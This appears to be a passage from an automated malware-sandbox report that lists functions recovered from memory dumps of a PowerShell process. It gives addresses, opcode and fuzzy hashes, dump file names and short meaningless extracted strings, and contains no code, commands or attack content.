Similarity

API ID:
String ID:
API String ID:
Opcode ID: c973c2da013cdeb13359fec9adaca8a54dcd35491c3a68a2e33dc35565d0cf3b
Instruction ID: 04c4a68ce0b0408479efe5b70370561e4416c57ba788c1df431e794bfaa76424
Opcode Fuzzy Hash: c973c2da013cdeb13359fec9adaca8a54dcd35491c3a68a2e33dc35565d0cf3b
Instruction Fuzzy Hash: 1341E874E005199FCB15DF9CC9849ADBBB2FF48325B288658E815AB364D336EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 089A6470 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596456637.00000000089A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_89a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c357ae57d9cd33bd56e1d21da5151d09929e77c814a638214311530e156a3a8
Instruction ID: f6032c200b89b1091158d0fd9fa334378e500efe91bb66fde76e2ad129751b46
Opcode Fuzzy Hash: 4c357ae57d9cd33bd56e1d21da5151d09929e77c814a638214311530e156a3a8
Instruction Fuzzy Hash: D741E774E005199FCB15DF9CC9849AEBBB2BF48325B288658E815AB364D332EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 089A6E39 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596456637.00000000089A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_89a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b140b15a87d8f90dcb21d8d4f8e92a197b1f6c0e41b8edc936201518e0c832f1
Instruction ID: 1b348733a9fcce960f1492d36282d7069b6d366b6acccac4229c59774da4b50a
Opcode Fuzzy Hash: b140b15a87d8f90dcb21d8d4f8e92a197b1f6c0e41b8edc936201518e0c832f1
Instruction Fuzzy Hash: DB410675E001099FCB05DF98C5849AEBBF2FF88325B288658E915AB3A4C335EC51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 089A7407 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596456637.00000000089A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_89a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13fe388829c0592b92cb19731132a9395b9275a7ef2bc44dd9f292bd6f3638c
Instruction ID: 935f267df8504634ab43254a8ce2baf513dd88e3fc19cb80946061049daea322
Opcode Fuzzy Hash: b13fe388829c0592b92cb19731132a9395b9275a7ef2bc44dd9f292bd6f3638c
Instruction Fuzzy Hash: 3F41E874A005059FCB14DF9CC5859AEBBF2FF48315B248658E955AB3A4D335EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04DD2BB0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba02ba2e91e71fbbb2fda872ea577a030ac35ae96a350077516c3c000cb8c26f
Instruction ID: 98163dc87f6e320138b415015649974378728062e8b55306b4de0d589adb0f36
Opcode Fuzzy Hash: ba02ba2e91e71fbbb2fda872ea577a030ac35ae96a350077516c3c000cb8c26f
Instruction Fuzzy Hash: 26413AB4A005098FCB15CF58C594AAAFBB1FF48314F158599D806AB369C736FC51CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07AD08C0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa01fefa6f30d863fc6f2418416c269c47d4be343c7b9d95c75552f4a58ab88e
Instruction ID: e5684fc552e27e60d6b3af482c54700231a9b6ba6de0cb9385fda534a046c0ca
Opcode Fuzzy Hash: aa01fefa6f30d863fc6f2418416c269c47d4be343c7b9d95c75552f4a58ab88e
Instruction Fuzzy Hash: F731BFF0B002069FDB24DF69C140B6BBBF2AFC9610F1680A9E5269B321D731DD41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07ADE934 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6376ddbfda7a02b0b308cfcfa33e22921d00a867404928a8f9e42b3d9c0f8176
Instruction ID: 76292753b5d34132920d623ad35b9776b3d079faa4c59fa9e744f28bb04cbaba
Opcode Fuzzy Hash: 6376ddbfda7a02b0b308cfcfa33e22921d00a867404928a8f9e42b3d9c0f8176
Instruction Fuzzy Hash: E1315BF27041258BCB10576C99016AEFBA3AFD4319F10847AD9139F796CE32DD1183B6

Uniqueness

Uniqueness Score: -1.00%

Function 07AD13E8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be8054afedf843d377ee88a46ab6f345f5477ed5ed3ed0a3646f6b1c719d705
Instruction ID: 1124a41ccf3cc5e540ce03519aa0c8beca9e15d7b96272442e0c242ac1f60732
Opcode Fuzzy Hash: 0be8054afedf843d377ee88a46ab6f345f5477ed5ed3ed0a3646f6b1c719d705
Instruction Fuzzy Hash: 6B2149F170030A6BDB245ABAD908B37B6D6AFC4715F24842AE51ACF385ED36CC81C360

Uniqueness

Uniqueness Score: -1.00%

Function 04DDD50D Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b149e276ec45a88c27d01f24f812423553f214fefcc7fe33a02a6a6d7d5db2
Instruction ID: dde2206fbace7c62704b4e71d525922d54891b36353738a278850a909cfb25d0
Opcode Fuzzy Hash: 83b149e276ec45a88c27d01f24f812423553f214fefcc7fe33a02a6a6d7d5db2
Instruction Fuzzy Hash: E541E1B190024D9FDB10DFA9C984ADEBFB5AF49314F24802AE419AB254DB35A949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04DDD518 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210be63f8527b8c938fa5961229094a50fc3823c1fdec9dda6fffdbffdf1cda4
Instruction ID: 8800b390cffb6d68098ba4fbaabc25c007da8b6fdb37a80fca4af1df4e9d84ac
Opcode Fuzzy Hash: 210be63f8527b8c938fa5961229094a50fc3823c1fdec9dda6fffdbffdf1cda4
Instruction Fuzzy Hash: DF41CFB1D0024DDFDB10DFA9C984ADEBFB5BF48314F24802AE419AB254DB75A949CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04DDADE0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203aabecb4cba942b63e76440c4a9593bbdff589496383a2625dd137b00b5263
Instruction ID: 46371cc38fa78ee1b2e0f97a436f490114b5ed568124a342615565967bfe341c
Opcode Fuzzy Hash: 203aabecb4cba942b63e76440c4a9593bbdff589496383a2625dd137b00b5263
Instruction Fuzzy Hash: B8312774A0061ADFCB14CF59C5849AAFBF2FF48310B248659E518AB355C732FC91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04DDADDF Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4a81deaec14850f3c793f878cc2f9d56be1b54615b858c532c565ccac0cb78
Instruction ID: 5f26e892c01a8afc1401f40c719f0eecec86999e938944a6bc2c7555dfdf23f5
Opcode Fuzzy Hash: 2d4a81deaec14850f3c793f878cc2f9d56be1b54615b858c532c565ccac0cb78
Instruction Fuzzy Hash: BA31E674A00609DFCB14CF99C5849AAFBF1FF48310B258659E919AB755C732FC91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07AD13CE Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538da538e6b9041dd47504c13e829137f915c46cf050c551206704029d9092d0
Instruction ID: 0e05c1c6bc6abf9157d45edd531cff153a6e68b4eab3a540bc3e9e0085d4fbba
Opcode Fuzzy Hash: 538da538e6b9041dd47504c13e829137f915c46cf050c551206704029d9092d0
Instruction Fuzzy Hash: 0C218BF170438A6BDB344B76C8087667BA26FC5314F19846AE519CF2C6E9399984C321

Uniqueness

Uniqueness Score: -1.00%

Function 07AD0AE8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b0392d6577ac14615e7ae0b3ea54656e9195eb257cf65d351027f94ddc03e5
Instruction ID: 6a036f6078eb2589d3ece2f444ee562c313550bc6af2ff349b8ab6b6f7df4f1a
Opcode Fuzzy Hash: f9b0392d6577ac14615e7ae0b3ea54656e9195eb257cf65d351027f94ddc03e5
Instruction Fuzzy Hash: 8C1104B2314201ABCB144F45C590B3B7792EBC4318F18C069E93A8F2A5CB36CD41D791

Uniqueness

Uniqueness Score: -1.00%

Function 07AD5551 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3d45ffa02f913e34008c4705e4da859c8bd7771ff94f9116f754d0468b09d8
Instruction ID: 6f644a823c7dba331c3a0f1c00df281504ece07abafb2077866351131ef2151d
Opcode Fuzzy Hash: 3b3d45ffa02f913e34008c4705e4da859c8bd7771ff94f9116f754d0468b09d8
Instruction Fuzzy Hash: 841136B3B001118BCB1056ADE8126AEF792DBD5215F14C43AE623CB395DE32C922C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD0AF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7756e73742004c03cdd51428814ee06bea93d90a0cd9e982e6b89016e596aca0
Instruction ID: 2857357e4c8045c00fe848de06a43e217da374ef91be906d18045cc5c31a2ba0
Opcode Fuzzy Hash: 7756e73742004c03cdd51428814ee06bea93d90a0cd9e982e6b89016e596aca0
Instruction Fuzzy Hash: FD1127B3304205ABCB144F45C490B37B796EBC4318F58C065E83A8F2A5DB36DD41D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD11D8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a803dacb99adb0d65f12723c2583e5758c4b0eb3fd73d57b0324e343b37d142
Instruction ID: b917d6f001284132afb8dc775b8e712afa60672dfc49b330a0703ff92c459d30
Opcode Fuzzy Hash: 4a803dacb99adb0d65f12723c2583e5758c4b0eb3fd73d57b0324e343b37d142
Instruction Fuzzy Hash: 2101F77630021ADFCB2457AAE40057BB7A99BC6223F15C53EE566CB250EA33CC46C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04DDB1F4 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08e9dcdd743613288402ec8e40ccaba3680ef94de71cfe41d37d438384574e32
Instruction ID: 168362bbfc504c503e9f7cbfeaca975d2f71f0c052bf4eaade698e3c59e1f0fa
Opcode Fuzzy Hash: 08e9dcdd743613288402ec8e40ccaba3680ef94de71cfe41d37d438384574e32
Instruction Fuzzy Hash: 7311A775A00249EFDB05CF98D984A9DFBF2FF48314F298559E405AB365C771E886CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04CBD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580176260.0000000004CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cbd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac9176d6ddc7046e66cdc553c9d5c4c0a640e84b8254474ff0253bca8e1893b
Instruction ID: cb0ac72572e31fb2b11bc75749c05a47a50394a389ff918171ae38b62530944f
Opcode Fuzzy Hash: cac9176d6ddc7046e66cdc553c9d5c4c0a640e84b8254474ff0253bca8e1893b
Instruction Fuzzy Hash: 9801F7311097009AE7104E26F9847A7BF99DF41324F0CC429ED8A0B146C679A985C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 04CBD01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580176260.0000000004CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cbd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59dbf2e07c2bdea8af538ad90cf76c088890b5e69f251224860a20d8f6ddf29f
Instruction ID: 7d6bd96535fddd629ec9087e75a03b078d0eb0a283704f8592b3cf77766fbca1
Opcode Fuzzy Hash: 59dbf2e07c2bdea8af538ad90cf76c088890b5e69f251224860a20d8f6ddf29f
Instruction Fuzzy Hash: E7F0C8710043449EE7108E16D9847A2FF98EB41734F18C45AED480F246C27AA845CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD1D87 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc2ccd6891fb9491be4f582c953bdcfa0e9ff5b4fc10b26919906418c2560592
Instruction ID: 99c8715ca85d1cce2cd22104c099675533b24bd9350e0e5684953661cba77b6f
Opcode Fuzzy Hash: bc2ccd6891fb9491be4f582c953bdcfa0e9ff5b4fc10b26919906418c2560592
Instruction Fuzzy Hash: DDB012711451405FC205CB54CD51880BB25AF83324328C0CEE4048B253CB27DD03D710

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04DDECB0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vk, xrefs: 04DDEEFB

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID: \Vk
API String ID: 0-3272359581
Opcode ID: b0e6a935be675fedf392b07a74b2de795828e03236bcfcf1bc68bf7cf49c0aed
Instruction ID: 2e62ae7af4a4757b4362b1e61e1e1ac83dac2948c73a0f1f3adeb1b0910411ee
Opcode Fuzzy Hash: b0e6a935be675fedf392b07a74b2de795828e03236bcfcf1bc68bf7cf49c0aed
Instruction Fuzzy Hash: 89915B70E00609DFDF14CFA9C98579EBBF2FF88314F148529E419AB294EB74A845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 089A0040 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596456637.00000000089A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_89a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b634b939f1a0b8cf2348e69cf3a683d8a5ec8002c94c31200c9e4154fd55ac
Instruction ID: 29dd689f0fad8d986086e61f48ad4edab5911a6fd1785f523ba07a5a78b7bc91
Opcode Fuzzy Hash: 62b634b939f1a0b8cf2348e69cf3a683d8a5ec8002c94c31200c9e4154fd55ac
Instruction Fuzzy Hash: C2B16C70E00619CFDF10DFA9D8857DEBBF2AF88319F148129D819E7254EB749886CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04CBD6CC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2580176260.0000000004CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cbd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e072d47d59c50a341dedcc97c4324cf5e7fcab585304442b74eeefed9f31cf
Instruction ID: 2ae53caca3a15567125b5cb53f8ca7497b0ac755c50cb4dde51c21d3998e1218
Opcode Fuzzy Hash: a7e072d47d59c50a341dedcc97c4324cf5e7fcab585304442b74eeefed9f31cf
Instruction Fuzzy Hash: 562145B2200200DFCB04DF14D9C0BA6BF66FB94324F24C5A9DC4A1B21AC336E446CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 07ADA91D Relevance: 19.0, Strings: 15, Instructions: 285COMMON

Download Yara Rule

Strings

84|l, xrefs: 07ADAAFC
$^q, xrefs: 07ADA975
(dq, xrefs: 07ADAB78
tP^q, xrefs: 07ADAB44
84|l, xrefs: 07ADAAF2
84|l, xrefs: 07ADAA00
4'^q, xrefs: 07ADAC1C
84|l, xrefs: 07ADA9F6
(dq, xrefs: 07ADAB0A
(dq, xrefs: 07ADABAD
tP^q, xrefs: 07ADAB50
tP^q, xrefs: 07ADAA49
tP^q, xrefs: 07ADAA55
4'^q, xrefs: 07ADAC28
(dq, xrefs: 07ADAB6E

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84|l$84|l$84|l$84|l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
API String ID: 0-3507498318
Opcode ID: f141d9e6df32dadb92b814e48f756f5bc59b188ab2766824798a517bd052ec18
Instruction ID: 09353879472910b3b52ebdd9e87be860f0b232309c40c9b9a4dfbee4b99cd419
Opcode Fuzzy Hash: f141d9e6df32dadb92b814e48f756f5bc59b188ab2766824798a517bd052ec18
Instruction Fuzzy Hash: F7A1F7B1B4010A9FCB149F69D9046AABBF3BBC9310F15C46AE8269F394CB35DD81C791

Uniqueness

Uniqueness Score: -1.00%

Function 07ADCD80 Relevance: 10.4, Strings: 8, Instructions: 408COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07ADD0BC
84|l, xrefs: 07ADCF4D
tP^q, xrefs: 07ADCF9F
tP^q, xrefs: 07ADCFAB
84|l, xrefs: 07ADCF57
84|l, xrefs: 07ADD05F
tP^q, xrefs: 07ADD0B0
84|l, xrefs: 07ADD053

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 84|l$84|l$84|l$84|l$tP^q$tP^q$tP^q$tP^q
API String ID: 0-111074967
Opcode ID: c515d1326db62c67f6664316d56f8b2dba88612c022933bdd77e0589d1af27e4
Instruction ID: fa1ade40750ab9ed37771678cf4e7c0ada59e7d4847270265131b0e584e532b4
Opcode Fuzzy Hash: c515d1326db62c67f6664316d56f8b2dba88612c022933bdd77e0589d1af27e4
Instruction Fuzzy Hash: A4D119B1B002059FCB149F68D914AAABBE3EFC9720F14C46BE8269F351DA31DD45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07ADC058 Relevance: 10.3, Strings: 8, Instructions: 267COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07ADC139
4'^q, xrefs: 07ADC2F5
4'^q, xrefs: 07ADC145
4'^q, xrefs: 07ADC2E9
XY~l, xrefs: 07ADC11F
XY~l, xrefs: 07ADC113
DUnk, xrefs: 07ADC2B5
Tnk, xrefs: 07ADC105

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: Tnk$4'^q$4'^q$4'^q$4'^q$DUnk$XY~l$XY~l
API String ID: 0-721681563
Opcode ID: 6462a698c672c669abac3180d75c563ae2aabc1572c2ed71449333ef6102996e
Instruction ID: 739a0a1eb088b4128f828467008b1168f723db1b2f017bffb4f6e383d408e69b
Opcode Fuzzy Hash: 6462a698c672c669abac3180d75c563ae2aabc1572c2ed71449333ef6102996e
Instruction Fuzzy Hash: 0091F6B1B0021A8FCB149F6895446AAFBF6AFCA220F54807AD427DF255EA31CD45C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD7D16 Relevance: 7.9, Strings: 6, Instructions: 355COMMON

Download Yara Rule

Strings

x.ok, xrefs: 07AD824C
4'^q, xrefs: 07AD808C
4'^q, xrefs: 07AD8009
4'^q, xrefs: 07AD7FFD
4'^q, xrefs: 07AD8080
-ok, xrefs: 07AD8283

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$x.ok$-ok
API String ID: 0-789595452
Opcode ID: 2ed6d75e26cd91fd3355652104976c99867fa5e68866dd92c375ee92674c7d15
Instruction ID: c84a53c2419f661d916e2ba3d9e9b36d1291d26c0e1fec755797d7432020371b
Opcode Fuzzy Hash: 2ed6d75e26cd91fd3355652104976c99867fa5e68866dd92c375ee92674c7d15
Instruction Fuzzy Hash: F0F15BB0A40219DFCB54DF58CD44B9ABBB2BF88304F1084A9D5096F395CB76AE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07AD97D8 Relevance: 7.7, Strings: 6, Instructions: 214COMMON

Download Yara Rule

Strings

$^q, xrefs: 07AD987E
$^q, xrefs: 07AD98C9
$^q, xrefs: 07AD98D9
$^q, xrefs: 07AD99EE
4'^q, xrefs: 07AD9903
4'^q, xrefs: 07AD98F7

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
API String ID: 0-3669853574
Opcode ID: 27a31b686147690ba0eaee0fdefb45701ed56e0eb5e6ee5857a55942fd6e893d
Instruction ID: 38d25dfdad4aa08c3bbc915df8f4993e93ffaab59903d3217e9da576a5a7d953
Opcode Fuzzy Hash: 27a31b686147690ba0eaee0fdefb45701ed56e0eb5e6ee5857a55942fd6e893d
Instruction Fuzzy Hash: 776148B1B04209DFCB149F69C4042ABB7FAEFC1612F14C46AE46A8F261DB31EC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD7370 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$^q, xrefs: 07AD73EB
$^q, xrefs: 07AD73C3
$^q, xrefs: 07AD73F7
$^q, xrefs: 07AD73A7
$^q, xrefs: 07AD7413
$^q, xrefs: 07AD7407

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: f39581290937ed1b35698ce1cbed85a4ed2a2631e9424070643d4808505732db
Instruction ID: 638527518adc3db24be35acec41bd1e06320ef46dcde1eb826890a9be5df1662
Opcode Fuzzy Hash: f39581290937ed1b35698ce1cbed85a4ed2a2631e9424070643d4808505732db
Instruction Fuzzy Hash: 3B31F5F2B443478FDB2E5A6594581B6BBB2ABC1711B14487FC8638F245DE71CC4AC352

Uniqueness

Uniqueness Score: -1.00%

Function 07ADAD2D Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07ADAE16
$^q, xrefs: 07ADAD85
84|l, xrefs: 07ADADB7
tP^q, xrefs: 07ADAE0A
84|l, xrefs: 07ADADC1

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 84|l$84|l$tP^q$tP^q$$^q
API String ID: 0-3578806586
Opcode ID: 22c6de84c256bc5acafcf99b154a31cb34fc92f86bdc6958485a0c4a7aeeb8e0
Instruction ID: 7b42176a27014f992254f61a4fbddb3f03e07baa10360ed570dbf09b8239b7ff
Opcode Fuzzy Hash: 22c6de84c256bc5acafcf99b154a31cb34fc92f86bdc6958485a0c4a7aeeb8e0
Instruction Fuzzy Hash: 026114B2B00216DFCB149B689504AAABBF2AFCD311F14C46AE4669F391CB31DD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07AD0470 Relevance: 6.4, Strings: 5, Instructions: 145COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07AD056A
$^q, xrefs: 07AD04FC
4'^q, xrefs: 07AD055E
$^q, xrefs: 07AD0535
$^q, xrefs: 07AD0541

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 43b46e39fc17574aa1008546f20a4eb1a2ae943d23f682c1a0bb218a460948ef
Instruction ID: 41e15b0aa80cc245f6cd8e99cb39832105a624cc26bfe3bf244ab13a744b0196
Opcode Fuzzy Hash: 43b46e39fc17574aa1008546f20a4eb1a2ae943d23f682c1a0bb218a460948ef
Instruction Fuzzy Hash: BB4146B1B043069FDB159B7595106AFBFA2AFC6210F04846AC826CF295DB35CD45C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 07ADA3FD Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

$^q, xrefs: 07ADA499
4'^q, xrefs: 07ADA4B9
4'^q, xrefs: 07ADA4C5
$^q, xrefs: 07ADA453
